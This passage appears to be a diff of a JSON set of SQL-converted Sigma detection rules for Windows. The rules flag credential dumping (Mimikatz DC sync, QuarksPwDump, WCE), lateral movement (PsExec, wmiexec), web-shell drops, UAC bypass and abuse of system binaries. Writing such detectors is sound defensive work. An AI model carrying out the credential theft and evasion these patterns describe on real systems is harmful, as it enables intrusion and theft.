+ "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR 